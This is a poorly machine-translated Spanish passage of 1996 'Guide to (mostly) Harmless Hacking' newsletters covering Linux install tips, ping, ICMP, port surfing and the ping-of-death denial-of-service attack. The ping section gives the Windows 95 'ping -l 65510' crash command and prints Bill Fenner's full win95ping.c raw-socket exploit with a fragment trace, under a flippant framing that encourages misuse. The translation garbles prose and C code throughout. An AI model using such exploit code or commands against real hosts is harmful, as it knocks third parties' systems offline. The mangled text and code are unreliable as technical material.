Windows. Pero todos somos humanos, especialmente si siguiendo los consejos
del punto 7).
5) Obtener ms de una distribucin de Linux. La primera vez que he instalado
con xito Linux, finalmente ha golpeado en algo que trabaj con el disco de
arranque de una distribucin con el CD-ROM para otro. En cualquier caso, cada
distribucin de Linux tiene diferentes programas de utilidades, emuladores de
sistemas operativos, compiladores y ms. Aadir a todos a su sistema y se le
configura para convertirse ms all de lite.
6) Comprar un libro o dos o tres en Linux. No me gusta ninguno de ellos! Pero
son mejor que nada. La mayora de los libros sobre Linux vienen con uno o dos
CD-ROM que se pueden utilizar para instalar Linux. Pero me di cuenta que lo
que estaba en los libros no coincide exactamente con lo que haba en los CDROM.
7) Te recomiendo beber durante la instalacin. No puede hacer la depuracin ir
ms rpido, pero al menos no le importa lo difcil que es.
Ahora casi puedo garantizar que, incluso despus de todos estos 6 consejos,
usted todava tiene problemas con la instalacin de Linux. Oh, tengo 7 avisos
ah arriba? Olvdese nmero 7. Pero confiad. Dado que todos los dems tambin
sufre poderosamente durante la instalacin y el uso de Linux, el Internet tiene
una increble cantidad de recursos para el Linux -challenged.
Si usted es alrgico a conseguir flameado, puede empezar con los sitios Web de
soporte de Linux.
El mejor que he encontrado es http://sunsite.unc.edu:/pub/Linux/. Incluye la lista
Linux Preguntas frecuentes (FAQ), disponible en
sunsite.unc.edu:/pub/Linux/docs/FAQ.
En el directorio / pub / Linux / docs en sunsite.unc.edu encontrar una serie de
otros documentos sobre Linux, incluyendo Linux INFO-SHEET y META-FAQ,
El archivo HOWTO Linux est en el sitio Web sunsite.unc.edu en: / pub /
Linux / docs / HOWTO. El directorio / pub / Linux / docs / LDP contiene el
conjunto actual de manuales LDP.
Usted puede obtener `` Instalacin de Linux y Primeros pasos '' en
sunsite.unc.edu en / pub / Linux / docs / LDP / install-gua. El archivo README
no describe cmo puede solicitar una copia impresa del libro del mismo nombre
(alrededor de 180 pginas).
Ahora bien, si no te importa conseguir flameado, es posible que desee enviar
preguntas a la increble cantidad de grupos de noticias de Usenet que cubren
Linux. stas incluyen:
comp.os.linux.advocacy Beneficios de Linux compararon

granos comp.os.linux.development.system Linux, controladores de dispositivos


servidores Window System comp.os.linux.x Linux X
aplicaciones comp.os.linux.apps Escritura Linux
Compatibilidad de hardware comp.os.linux.hardware
instalacin comp.os.linux.setup Linux
comp.os.linux.networking Redes y comunicaciones
comp.os.linux.answers preguntas frecuentes, cmo-a, archivos LAME, etc.
linux.redhat.misc
alt.os.linux Uso comp.os.linux. * en lugar
alt.uu.comp.os.linux.questions Universidad Usenet le ayuda
Anuncios comp.os.linux.announce importantes para Linux
temas especficos Linux comp.os.linux.misc
Deseas que su Linux libre? Tobin Fricke ha sealado que "copias gratuitas de
los CD-ROM de Linux estn disponibles el sitio web Linux Soporte y CD
Givaway en http://emile.math.ucsb.edu:8000/giveaway.html. Este es un proyecto
en el que la gente dona CD de Linux que no necesitan nada ms. El proyecto fue
sembrado por los sistemas Linux Labs, que don 800 Linux CDs inicialmente!
Por favor, recuerde a donar de su Linux CD cuando haya terminado con ellos. Si
usted vive cerca de una reunin de intercambio de ordenador, de Fry,
Microcentro, u otro lugar, buscan de all. Por lo general son menos de $ 20, que
es una excelente inversin. Personalmente, me gusta Recursos del Linux
Desarrollador por Infomagic, que ahora depende de un conjunto de siete CD,
creo que Linux CD, que incluye todas las principales distribuciones de Linux
(Slackware, RedHat, Debian, Linux para DEC Alpha para nombrar unos pocos),
adems de espejos de tsx11.mit.edu y sunsite.unc.edu/pub/linux y mucho ms.
Tambin debe visitar la MARAVILLOSA La pgina de linux en
http://sunsite.unc.edu/linux, que tiene un montn de informacin, as como la
http://www.linux.org/. Tambin puede ser que desee comprobar hacia fuera
http://www.redhat.com/ y http://www.caldera.com/ para ms
informacin sobre las versiones comerciales de Linux (que todava estn
libremente disponibles bajo GNU) ".
Qu hay de la seguridad de Linux? S, Linux, al igual que todos los sistemas
operativos, es imperfecta.Eminentemente hackeable, si realmente quieres
saber. As que si usted quiere saber cmo asegurar su sistema Linux, o si debe
venir a travs de uno de los muchos proveedores de Internet que utilizan Linux y
quiere ir a explorar (perdn, me olvide
escribi eso), aqu es donde usted puede ir para obtener informacin:
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
ftp://info.cert.org/pub/tech_tips/root_compromise
http://bach.cis.temple.edu/linux/linux-security/
http://www.geek-girl.com/bugtraq/
Tambin hay ayuda para los usuarios de Linux en Internet Relay Chat
(IRC). Ben (cyberkid@usa.net)
alberga un canal llamado #linuxhelp en el servidor IRC Undernet.
Por ltimo, pero no menos importante, si usted quiere hacer preguntas de Linux
en la lista Happy Hacker, eres bienvenido. Podemos ser el ciego gua a otro
ciego, pero lo
demonios!
________________________________________

Derechos reservados 1996 Carolyn P. Meinel. Usted puede enviar la GUA


PARA (casi) Inofensivo HACKING, siempre y cuando salga de este aviso al
final.
________________________________________
____________________________________________________________
GUA PARA (casi) Inofensivo HACKING
Vol. 2 Nmero 3
Introduccin a TCP / IP. Eso significa que los paquetes! Los datagramas! Ping
oversize negacin de paquetes de servicio exploit explic. Pero este hack es
mucho menos su mayora inofensivas que la mayora. No intente hacer esto en
casa ...
____________________________________________________________
Si usted ha estado en la lista Happy Hacker por un tiempo, usted ha estado
recibiendo algunos artculos enviados de la lista Bugtraq sobre un nuevo paquete
de ping explotan.
Ahora bien, si esto ha sido sonando como un galimatas para usted, reljese. Es
realmente muy simple. De hecho, es tan simple que si utiliza Windows 95, para
el momento de terminar este artculo usted sabr un simple comando, una lnea
que se puede utilizar para bloquear muchos servidores de Internet y routers.
*************************************************
Usted puede ir a la crcel ADVERTENCIA: Esta vez no voy a implorar a los
tipos genio del mal imitador de esta lista para ser virtuoso y resistir la tentacin
de hacer mal uso de la informacin que yo estoy a punto de darles. A ver si me
importa! Si uno de esos tipos se ve atrapado estrellarse miles de ordenadores
conectados a Internet y routers, no slo van a ir a la crcel y obtener un gran
bien. Todos vamos a pensar que l o ella es un idiota. Esta explotacin es una
obviedad, comando de una lnea desde Windows 95. S, el sistema operativo que
est diseado para imbciles despistados. As que no hay nada de lite sobre este
hack. Qu es la lite es ser capaz de frustrar este ataque.
**************************************************
**************************************************
NEWBIE NOTA: Si los paquetes, los datagramas, y TCP / IP no son
exactamente sus amigos del alma, cranme, es necesario conseguir realmente en
la cama con ellos con el fin de decir que eres un hacker. As que aguantar aqu
por algunas cuestiones tcnicas. Cuando
estamos hecho, usted tendr la satisfaccin de saber que podra causar estragos
en Internet, pero son demasiado elite para hacerlo.
Un paquete es una forma de enviar informacin por va electrnica que mantiene
la posibilidad de errores. La idea es que ninguna tecnologa de transmisin es
perfecto. Alguna vez has jugado el juego "telfono"? Usted recibe una docena
de personas en un crculo y la primera persona susurra un mensaje a la
segunda. Algo as como "El pan es la forma ms baja de trigo." La segunda
persona susurra a la tercera, "Un vagabundo es la forma ms baja de hacer
trampa." Los terceros susurros, "Ron es la forma ms baja de
beber. "Y as sucesivamente. Es muy divertido para averiguar hasta qu punto el
mensaje puede mutar ya que pasa alrededor del crculo.
Pero cuando, por ejemplo, se obtiene de correo electrnico, usted prefiere que no
est en mal estado. As que el equipo que enva el correo electrnico lo rompe en
pedacitos llamados datagramas. Luego se envuelve cosas alrededor de cada
datagrama que le dicen lo que

equipo que necesita para ir a, de dnde viene, y que compruebe si el datagrama


podra haber sido mutilado. Estos paquetes de datagramas envueltos son
llamados "paquetes".
Ahora bien, si la computadora que enva correo electrnico a usted fuera a
empaquetar un largo mensaje en un solo paquete, las posibilidades son bastante
altas que conseguir en mal estado, mientras que en su camino hacia el otro
equipo. Eructos bits. As que cuando el equipo receptor comprueba el paquete y
encuentra que qued en mal estado, que
se tirarlo a la basura y decir a la otra computadora para enviar de nuevo. Podra
tomar un largo tiempo hasta que este paquete gigante recibe a travs intacta.
Pero si el mensaje se divide en una gran cantidad de pequeos pedazos y
envuelto en manojos de paquetes, la mayora de ellos ser bueno y el equipo
receptor los mantendr. A continuacin, decirle a la computadora que enva para
retransmitir slo los paquetes que arruinaron. Luego, cuando todas las piezas
finalmente llegan all, el equipo receptor los pone juntos en el orden correcto y
he aqu, est el, correo electrnico libre de errores completo.
TCP / IP significa Protocolo de Control de Transmisin / Protocolo de
Internet. Narra los equipos que estn conectados a Internet cmo empaquetar los
mensajes en paquetes y cmo leer los paquetes de estos paquetes desde otros
ordenadores. Ping utiliza TCP / IP para que sus paquetes.
**********************************************
"Ping" es un comando que enva un palpador a cabo desde el ordenador a otro
ordenador para ver si est encendido y conectado a la misma red que se
encuentra. En Internet hay unos diez millones de ordenadores que puede hacer
ping.
Ping es un comando que puede dar, por ejemplo, desde la Unix, Windows 95 y
sistemas operativos Windows NT.Es parte del Protocolo de mensajes de control
de Internet (ICMP), que se utiliza para solucionar problemas de redes TCP /
IP. Lo que hace es decirle a un equipo remoto a hacerse eco de vuelta un
ping. As que si tienes tu mesa de ping
hacia atrs, usted sabe que la computadora est vivo. Adems, algunas formas
del comando ping tambin le dir cunto tiempo le toma a un mensaje que salir a
ese equipo y volver de nuevo.
Pero, cmo el equipo sabe que el ping slo envi realmente reson desde el
equipo de destino? El datagrama es la respuesta. La mesa de ping enva un
datagrama. Si el ping regresar ejerce en este mismo datagrama, sabes que era su
tenis que acaba hizo eco de la espalda.
El formato bsico de este comando es simplemente:
de ping nombre de host
donde "nombre de host" es la direccin de Internet del equipo que desea revisar.
Cuando le doy a este comando desde Sun Release 4.1 Unix, tengo la respuesta
"nombre de host est vivo."
**************************************
CONSEJO TCNICO: Debido a los poderes destructivos de ping, muchos
proveedores de servicios Internet esconden el programa ping en sus cuentas de
concha, donde los novatos despistados no pueden poner sus manos sobre l. Si
su cuenta shell dice "comando no encontrado" cuando se introduce el comando
ping, trate de:
/ usr / etc / ping nombre de host

Si esto no funciona, o bien probar el comando "ping whereis" o se quejan de


soporte tcnico de su proveedor de Internet. Es posible que hayan ddiabled de
ping para los usuarios normales, pero si te convences de soporte tcnico eres un
buen ciudadano de Internet que pueden dejar de usarlo.
***************************************
****************************************
NEWBIE NOTA: Usted dice que no se puede encontrar una manera de hacer
ping desde su servicio on-line? Eso puede ser porque usted no tiene una cuenta
shell. Pero hay una cosa que realmente necesita para poder hackear: UNA
CUENTA SHELL !!!!
La razn por hackers se burlan de las personas con cuentas en lnea Amrica se
debe a que los ISP no dar a conocer las cuentas de concha. Esto se debe a
America Online quiere que seas buenos chicos y chicas, y no hackear!
Una "cuenta shell" es una cuenta de Internet en el que su ordenador se convierte
en un terminal de uno de los equipos host de su ISP. Una vez que ests en la
"cscara" usted puede dar comandos al sistema operativo (que suele ser Unix)
justo
como si estuviera sentado all en la consola de uno de los ejrcitos de su ISP.
Puede que ya tenga una cuenta shell, pero simplemente no saben cmo
conectarse a la misma. Apoyo llamada tecnologa con su ISP para averiguar si
usted tiene uno, y cmo conseguir en l.
***************************************
Hay todo tipo de variaciones de lujo en el comando ping. Y, adivinen qu, cada
vez que hay un comando que usted da a travs de Internet que tiene un montn
de variaciones, se puede casi contar con que exista algo hackeable
all. Muhahaha!
La mesa de ping inundacin es un ejemplo sencillo. Si su sistema operativo le
permitir salirse con dar la orden:
-> Ping -f nombre de host
enva una verdadera inundacin de pings, tan rpido como mquina host de su
ISP puede hacerlos. Esto evita que el host que ha orientado tan ocupado
haciendo eco de nuevo sus pings que se puede hacer nada ms. Tambin pone
una carga pesada en la red.
Los hackers con los niveles primitivos a veces reunirse y utilizar varios de sus
ordenadores a la vez para hacer ping al mismo tiempo la computadora host de
Internet de alguna vctima. En general, esto mantendr el ordenador de la
vctima tambin
ocupado como para hacer otra cosa. Incluso puede bloquearse. Sin embargo, el
lado negativo (de los atacantes punto de vista) es que mantiene los atacantes
ordenadores atados, tambin.
**************************************
NETIQUETTE NOTA: Inundacin ping una computadora es extremadamente
grosero. Djate atrapar haciendo esto y usted ser afortunado si lo peor que
sucede es que su proveedor de servicios en lnea cierra su cuenta.Hacer esto para
un hacker serio y es posible que necesite un trasplante de identidad.
Si usted debe comenzar un ping inundacin tipo de por accidente, puede
apagarlo, mantenga pulsada la tecla de control y presionando "c" (Ctrl + C).
**************************************
*************************************

MAL GENIO TIP: Ping a ti mismo! Si utiliza algn tipo de Unix, el sistema
operativo le permitir utilizar su computadora para hacer casi cualquier cosa que
s que puede hacer a otros equipos. La direccin de red que te lleva
de nuevo a su propio equipo host es localhost (o 127.0.0.1). He aqu un ejemplo
de cmo utilizo localhost:
<babosa> [65] -> telnet localhost
Tratando 127.0.0.1 ...
Conectado a localhost.
Carcter de escape es '^]'.
SunOS UNIX (babosa)
iniciar sesin:
Mira, yo estoy de vuelta a la secuencia de inicio de sesin para el equipo
denominado "babosa" todo
de nuevo.
Ahora ping a mi mismo:
<llama> [68] -> / usr / etc / ping localhost
localhost est vivo
Esto le da el mismo resultado que si yo fuera a comando:
<llama> [69] -> / usr / etc / ping llama
llama.swcp.com est vivo
****************************************
*****************************************
Muhahaha CONSEJO: Quieres dar un tirn a la cadena de alguien? Dile a ftp a
127.0.0.1 e inicie sesin utilizando su propio nombre de usuario y contrasea
para warez kewl! Mi ex marido Keith Henson hizo eso a la Iglesia de la
Cienciologa. El COG ftp-ed a 127.0.0.1 y descubri todos sus escrituras con
derechos de autor. Ellos
asumido esto fue en el ordenador de Keith, no de ellos. Eran tan * * seguro de
que tena sus escrituras que lo llevaron a los tribunales. El juez, cuando se dio
cuenta que estaban simplemente repetirse de nuevo a su propia computadora,
literalmente, les ri fuera de los tribunales.
Para una transcripcin hilarante o cinta de audio de esta sesin de la corte
infame, correo electrnico hkhenson@cup.portal.com. Esa es la direccin de
correo electrnico de Keith. Me quito el sombrero a un excelente pirata!
*******************************************
Sin embargo, el paquete de ping oversize exploit que est a punto de aprender lo
har an ms dao a algunos hosts que una banda de conspiradores de ping
inundacin. Y lo har sin ocupar equipo de los atacantes por ms tiempo que la
fraccin de segundo que se necesita para enviar slo un ping.
La manera ms fcil de hacer este truco es para ejecutar Windows 95. No
tenerlo? En general, usted puede encontrar una tienda de El Cheapo que va a
vender a usted por $ 99.
Para ello, primero configurar su sistema de Windows 95 para que pueda hacer
una conexin PPP o SLIP con Internet mediante el programa de Acceso
telefnico a redes bajo el icono Mi PC. Es posible que necesite un poco de
ayuda de su apoyo ISP tecnologa en configurar esto. Debe hacerlo de esta
manera o este truco no funcionar.Su America Online dialer * * Definitivamente
no va a funcionar.
************************************

NOTA NEWBIE: Si su conexin a Internet le permite ejecutar un navegador


web que muestran imgenes, puede utilizar ese nmero de acceso telefnico con
su programa de Windows 95 Acceso telefnico a redes para obtener ya sea una
conexin PPP o SLIP.
************************************
A continuacin, obtener su conectado a Internet. Pero no ejecute un navegador o
cualquier cosa. En cambio, una vez que su programa Acceso telefnico a redes
le dir que usted tiene una conexin, haga clic en el botn "Inicio" y vaya a la
lista de "MS-DOS". Abra la ventana de DOS. Usted obtendr un aviso:
C: \ windows \>
Ahora vamos a hacer esto primero el buen camino ciudadana. En esta pantalla
puede escribir un comando ordinario llanura "ping":
C: \ windows \ de ping nombre de host
donde "nombre de host" es la direccin de algn equipo de Internet. Por
ejemplo, puede hacer ping thales.nmia.com, que es uno de mis equipos
favoritos, el nombre de un filsofo griego oscuro.
Ahora bien, si usted pas a conocer la direccin de uno de los ordenadores de
Saddam Hussein, sin embargo, es posible que desee dar el comando:
c: \ windows \ de ping -l 65510 saddam_hussein's.computer.mil
Ahora realmente no hacer esto a un equipo de verdad! Algunos, pero no todos,
los ordenadores se bloquear y, o bien permanecen colgados o reiniciar cuando
consiguen este ping. Otros seguirn trabajando alegremente a lo largo, y luego
de repente pasar por debajo de horas ms tarde.
Por qu? Ese extra aadido -l 65510 crea un datagrama gigante para el paquete
de ping. Algunos equipos, cuando se le pregunt a devolver un datagrama
idnticos, pongo muy mal estado.
Si desea que todos los detalles sangrientos en este ping explotan, incluyendo
cmo proteger sus ordenadores de ella, echa un vistazo
http://www.sophist.demon.co.uk/ping.
Ahora bien, hay otras maneras de fabricar un ping datagrama gigante adems de
utilizar Windows 95. Por ejemplo, si ejecuta ciertas versiones de FreeBSD o
Linux de Unix en su PC, puede ejecutar este programa, el cual fue enviado a la
lista de Bugtraq.
De: Bill Fenner <fenner@freefall.freebsd.org>
Para: Mltiples destinatarios de la lista BUGTRAQ
<BUGTRAQ@netspace.org>
Asunto: Ping programa de explotar
Dado que algunas personas no tienen necesariamente de Windows '95 cajas por
ah, yo (Fenner) escribi lo siguiente hazaa programa. Se requiere una capa de
conexin prima que no se metan con el paquete, por lo BSD 4.3, SunOS y
Solaris son
a cabo. Trabaja muy bien en sistemas 4.4BSD. Se debe trabajar en Linux si
compila con -DREALLY_RAW.
Sintase libre de hacer con esto lo que quieres. Utilice esta herramienta slo para
poner a prueba sus propias mquinas, y de no chocar a otros '.
* Win95ping.c
*
* Simular el win95 "ping -l 65510 buggyhost" mal.
* Versin 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996
*

* Esto requiere sockets crudos que no ensucia con el paquete del todo (otra
* Que la adicin de la suma de comprobacin). Eso significa que SunOS, Solaris
y
* Los sistemas basados en BSD4.3 estn fuera. Sistemas BSD4.4 (FreeBSD,
NetBSD,
* OpenBSD, BSDI) funcionar. Linux podra funcionar, yo no tengo un Linux
* Sistema de probarlo en.
*
* El ataque de la caja Win95 se ve as:
* 17: 26: 11.013622 cslwin95> arkroyal: icmp: echo peticin (frag 6144: 1480
@ 0 +)
* 17: 26: 11.015079 cslwin95> arkroyal: (frag 6144: 1480 @ 1480 +)
* 17: 26: 11.016637 cslwin95> arkroyal: (frag 6144: 1480 @ 2960 +)
* 17: 26: 11.017577 cslwin95> arkroyal: (frag 6144: 1480 @ 4440 +)
* 17: 26: 11.018833 cslwin95> arkroyal: (frag 6144: 1480 @ 5920 +)
* 17: 26: 11.020112 cslwin95> arkroyal: (frag 6144: 1480 @ 7400 +)
* 17: 26: 11.021346 cslwin95> arkroyal: (frag 6144: 1480 @ 8880 +
* 17: 26: 11.022641 cslwin95> arkroyal: (frag 6144: 1480 @ 10360 +)
* 17: 26: 11.023869 cslwin95> arkroyal: (frag 6144: 1480 @ 11840 +)
* 17: 26: 11.025140 cslwin95> arkroyal: (frag 6144: 1480 @ 13320 +)
* 17: 26: 11.026604 cslwin95> arkroyal: (frag 6144: 1480 @ 14800 +)
* 17: 26: 11.027628 cslwin95> arkroyal: (frag 6144: 1480 @ 16280 +)
* 17: 26: 11.028871 cslwin95> arkroyal: (frag 6144: 1480 @ 17760 +)
* 17: 26: 11.030100 cslwin95> arkroyal: (frag 6144: 1480 @ 19240 +)
* 17: 26: 11.031307 cslwin95> arkroyal: (frag 6144: 1480 @ 20720 +)
* 17: 26: 11.032542 cslwin95> arkroyal: (frag 6144: 1480 @ 22200 +)
* 17: 26: 11.033774 cslwin95> arkroyal: (frag 6144: 1480 @ 23680 +)
* 17: 26: 11.035018 cslwin95> arkroyal: (frag 6144: 1480 @ 25160 +)
* 17: 26: 11.036576 cslwin95> arkroyal: (frag 6144: 1480 @ 26640 +)
* 17: 26: 11.037464 cslwin95> arkroyal: (frag 6144: 1480 @ 28120 +)
* 17: 26: 11.038696 cslwin95> arkroyal: (frag 6144: 1480 @ 29600 +)
* 17: 26: 11.039966 cslwin95> arkroyal: (frag 6144: 1480 @ 31080 +)
* 17: 26: 11.041218 cslwin95> arkroyal: (frag 6144: 1480 @ 32560 +)
* 17: 26: 11.042579 cslwin95> arkroyal: (frag 6144: 1480 @ 34040 +)
* 17: 26: 11.043807 cslwin95> arkroyal: (frag 6144: 1480 @ 35520 +)
* 17: 26: 11.046276 cslwin95> arkroyal: (frag 6144: 1480 @ 37000 +)
* 17: 26: 11.047236 cslwin95> arkroyal: (frag 6144: 1480 @ 38480 +)
* 17: 26: 11.048478 cslwin95> arkroyal: (frag 6144: 1480 @ 39960 +)
* 17: 26: 11.049698 cslwin95> arkroyal: (frag 6144: 1480 @ 41440 +)
* 17: 26: 11.050929 cslwin95> arkroyal: (frag 6144: 1480 @ 42920 +)
* 17: 26: 11.052164 cslwin95> arkroyal: (frag 6144: 1480 @ 44400 +)
* 17: 26: 11.053398 cslwin95> arkroyal: (frag 6144: 1480 @ 45880 +)
* 17: 26: 11.054685 cslwin95> arkroyal: (frag 6144: 1480 @ 47360 +)
* 17: 26: 11.056347 cslwin95> arkroyal: (frag 6144: 1480 @ 48840 +)
* 17: 26: 11.057313 cslwin95> arkroyal: (frag 6144: 1480 @ 50320 +)
* 17: 26: 11.058357 cslwin95> arkroyal: (frag 6144: 1480 @ 51800 +)
* 17: 26: 11.059588 cslwin95> arkroyal: (frag 6144: 1480 @ 53280 +)
* 17: 26: 11.060787 cslwin95> arkroyal: (frag 6144: 1480 @ 54760 +)
* 17: 26: 11.062023 cslwin95> arkroyal: (frag 6144: 1480 @ 56240 +)
* 17: 26: 11.063247 cslwin95> arkroyal: (frag 6144: 1480 @ 57720 +)

* 17: 26: 11.064479 cslwin95> arkroyal: (frag 6144: 1480 @ 59200 +)


* 17: 26: 11.066252 cslwin95> arkroyal: (frag 6144: 1480 @ 60680 +)
* 17: 26: 11.066957 cslwin95> arkroyal: (frag 6144: 1480 @ 62160 +)
* 17: 26: 11.068220 cslwin95> arkroyal: (frag 6144: 1480 @ 63640 +)
* 17: 26: 11.069107 cslwin95> arkroyal: (frag 6144: 398 @ 65120)
*
*/
#include <stdio.h>
#include <sys / types.h>
#include <sys / socket.h>
#include <netdb.h>
#include <netinet / in.h>
#include <netinet / in_systm.h>
#include <netinet / ip.h>
#include <netinet / ip_icmp.h>
/*
* Si su kernel no muck con paquetes primas, REALLY_RAW #define.
* Esta es, probablemente, slo Linux.
*/
#ifdef REALLY_RAW
REVISIN #define (x) htons (x)
#else
REVISIN #define (x) (x)
#terminara si
int
main (int argc, char ** argv)
{
int s;
Char buf [1500];
struct ip * ip = buf (struct ip *);
struct icmp * icmp = (struct icmp *) (ip + 1);
struct hostent * hp;
dst sockaddr_in estructura;
int desplazamiento;
int on = 1;
bzero (buf, buf sizeof);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_IP)) <0) {
perror ("socket");
exit (1);
}
si (setsockopt (s, IPPROTO_IP, IP_HDRINCL, y en adelante, sizeof (a)) <0) {
perror ("IP_HDRINCL");
exit (1);
}
si (argc! = 2) {
fprintf (stderr, "uso:% s nombre de host \ n", argv [0]);
exit (1);
}
if ((CV = gethostbyname (argv [1])) == NULL) {
if ((IP-> ip_dst.s_addr = inet_addr (argv [1])) == -1) {

fprintf (stderr, "% s: unknown \ n", argv [1]);


}
} Else {
bcopy (HP-> h_addr_list [0], y IP-> ip_dst.s_addr, HP-> h_length);
}
printf ("Envo a% s \ n", inet_ntoa (IP-> ip_dst));
IP-> ip_v = 4;
IP-> ip_hl = sizeof * ip >> 2;
IP-> IP_TOS = 0;
IP-> ip_len = FIX (buf sizeof);
IP-> ip_id = htons (4321);
IP-> ip_off = FIX (0);
IP-> IP_TTL = 255;
IP-> ip_p = 1;
IP-> ip_sum = 0; / * Kernel rellena * /
IP-> ip_src.s_addr = 0; / * Kernel rellena * /
dst.sin_addr = IP-> ip_dst;
dst.sin_family = AF_INET;
icmp-> ICMP_TYPE = ICMP_ECHO;
icmp-> ICMP_CODE = 0;
icmp-> icmp_cksum = htons (~ (ICMP_ECHO << 8));
/ * La suma de comprobacin de todos 0s es fcil de calcular * /
para (offset = 0; compensado <65536; compensado + = (sizeof buf - sizeof * ip))
{
IP-> ip_off = FIX (offset >> 3);
si (offset <65120)
IP-> ip_off | = FIX (IP_MF);
ms
IP-> ip_len = FIX (418); / * Hacer total de 65.538 * /
si (sendto (s, buf, sizeof buf, 0, (struct sockaddr *) y el horario de verano,
dst sizeof) <0) {
fprintf (stderr, "contrarrestar% d:", offset);
perror ("sendto");
}
si (== 0 offset) {
icmp-> ICMP_TYPE = 0;
icmp-> ICMP_CODE = 0;
icmp-> icmp_cksum = 0;
}
}
}
(Fin de la mesa de ping de Fenner explotar mensaje.)
********************************************
Usted puede ir a la crcel NOTA: No slo es este hack no de lite, si usted est
leyendo esto usted no sabe lo suficiente para no ser pillado de hacer este ping
truco. Por otro lado, si usted fuera a hacerlo a un host de Internet en Irak ...
********************************************
Por supuesto que hay muchas otras cosas kewl que puedes hacer con ping. Si
usted tiene una cuenta shell, usted puede encontrar un montn de stuph acerca de
ping dando el comando:

hombre de ping
De hecho, usted puede conseguir un montn de detalles sobre cualquier
comando de Unix con "el hombre".
Divirtete con mesa de ping - y ser bueno! Pero recuerda, no estoy pidiendo a
los aspirantes a genios malignos que ser bueno. A ver si me importa cuando
llegas reventado ...
_________________________________________________________
Para suscribirse, correo electrnico hacker@techbroker.com con el mensaje
"subscribe hh." Para m, enva un correo electrnico confidencial (por favor, no
hay discusin de actividades ilegales) utilizan cmeinel@techbroker.com. Por
favor, llamas directos a
dev/null@techbroker.com. Piratera feliz!
Derechos reservados 1996 Carolyn P. Meinel. Usted puede enviar la GUA
PARA (casi) Inofensivo HACKING, siempre y cuando salga de este aviso al
final ..
________________________________________________________
____________________________________________________________
GUA PARA (casi) Inofensivo HACKING
Vol. 2 Nmero 4
Ms intro de TCP / IP: port surfing! Demonios! Cmo conseguir en casi
cualquier ordenador sin necesidad de acceder y sin infringir la ley. Impresiona a
tus amigos despistados y en realidad descubren kewl,, stuph seguridad jurdica.
____________________________________________________________
Hace unos das tuve una amiga visitar. Ella es 42 y no posee una
computadora. Sin embargo, ella est tomando una clase en computadoras
personales en un colegio comunitario. Quera saber lo que todo esto stuph
piratera se trata. As que decid presentarla al surf puerto. Y mientras lo hace,
nos tropezamos con algo kewl.
Puerto de surf se aprovecha de la estructura de TCP / IP. Este es el protocolo
(conjunto de reglas) que se utiliza para que las computadoras se comuniquen
entre s a travs de Internet. Uno de los principios bsicos de Unix (el sistema
operativo ms popular en Internet) es asignar un "puerto" de todas las funciones
que un ordenador puede comandar otra para llevar a cabo. Los ejemplos ms
comunes son para enviar y recibir correo electrnico, leer grupos de noticias
Usenet, telnet, transferir archivos y pginas web oferta.
************************
Newbie nota # 1: Un puerto de la computadora es un lugar donde la informacin
va en o fuera de ella. En el ordenador de casa, ejemplos de puertos son el
monitor, el cual enva informacin hacia fuera, el teclado y el ratn, que enva la
informacin, y el mdem, el cual enva informacin tanto fuera y por dentro.
Sin embargo, un equipo host de Internet como callisto.unm.edu tiene muchos
ms puertos que un ordenador personal tpico. Estos puertos se identifican por
nmeros. Ahora bien, estos no son todos los puertos fsicos, como un teclado o
un puerto serie RS232 (para el mdem). Son (software) puertos virtuales.
Un "servicio" es un programa que se ejecuta en un "puerto". Cuando haces telnet
a un puerto, que el programa est en marcha, a la espera de su entrada. Piratera
feliz!
************************

As que si quieres leer una pgina Web, sus contactos navegador nmero de
puerto 80 y le dice al equipo que administra ese sitio web para entrar. Y, por
supuesto, te metes en ese equipo servidor Web sin contrasea.
OK, gran cosa. Eso es bastante estndar para Internet. Muchos - la mayora ordenadores en Internet le permitir hacer algunas cosas con ellos sin necesidad
de una contrasea,
Sin embargo, la esencia de la piratera est haciendo cosas que no son
obvias. Que no slo saltan a la vista de los manuales. Una forma puede mover
un paso adelante respecto a la carrera del usuario de la computadora molino es
aprender a puerto surf.
La esencia del surf puerto es seleccionar un equipo de destino y explorar para
ver qu puertos estn abiertos y lo que puede hacer con ellos.
Ahora bien, si eres un hacker perezoso puede utilizar herramientas de hackers
enlatados como Satn o Netcat.Estos son los programas que se pueden ejecutar
desde Linux, FreeBSD o Solaris (todos los tipos de Unix) desde su PC. Ellos
buscan automticamente los equipos de destino. Ellos le dirn qu puertos estn
en uso. Tambin sondear estos puertos para la presencia de demonios con fallas
de seguridad saber, y decirte lo que son.
********************************
Newbie nota # 2: Un demonio no es una especie de grinch o gremlin o 666
tipo. Es un programa que se ejecuta en segundo plano en muchos puertos del
sistema (pero no todos) de Unix. Espera a que venga a lo largo y lo utilizan.Si
usted encuentra un demonio en un puerto, es probable que sea
hackeable. Algunas herramientas de hackers le dirn cules son las
caractersticas hackable son de los demonios que detectan.
********************************
Sin embargo, hay varias razones a los puertos de surf a mano en lugar de forma
automtica.
1) Usted aprender algo. Sondeo manualmente se obtiene una sensacin de la
tripa de cmo el demonio que se ejecuta en ese puerto se comporta. Es la
diferencia entre ver una pelcula porno y (rubor).
2) Usted puede impresionar a sus amigos. Si ejecuta una herramienta de pirateo
informtico enlatados como Satans tus amigos te miran y dicen: "Gran
cosa. Puedo ejecutar programas, tambin. "Van a ponerse inmediatamente en el
pequeo y sucio secreto del mundo de piratera informtica. La mayora de las
hazaas de hacking son slo lamerz ejecutando programas que recogieron de
algunos BBS o sitio ftp. Pero si escribe comandos de pulsaciones de teclas por
pulsacin de tecla se ver que el uso de su cerebro. Y usted puede ayudar a que
jueguen con los demonios, tambin, y darles una oleada gigante.
3) Los hackers verdaderamente lite navegar puertos y juegan con los demonios
con la mano, ya que es la nica manera de descubrir algo nuevo. Hay slo unos
pocos cientos de hackers - como mximo - que descubren nueva stuph. El resto
simplemente ejecutar hazaas conserva una y otra y otra vez. Boring. Pero te
estoy enseando cmo llegar a la cima del hacker.
Ahora djame decirte lo que mi amigo media edad y yo descubrimos
simplemente andar por ah. En primer lugar, decidimos que no queramos perder
el tiempo jugando con algn pequeo equipo host menor. Hey, vamos a ir para el
gran momento!
As que, cmo encontrar un ordenador Kahuna grande en Internet? Empezamos
con un dominio que consista en una LAN de PCs con Linux que se me ocurri

ya conocer, que es utilizado por el acceso a Internet de Nuevo Mxico ISP:


nmia.com.
*****************************
Newbie Nota # 3: Un dominio es una direccin de Internet. Se puede utilizar
para buscar que dirige los ordenadores utilizados por el dominio, y tambin para
mirar hacia arriba cmo ese dominio est conectado al resto de Internet.
*****************************
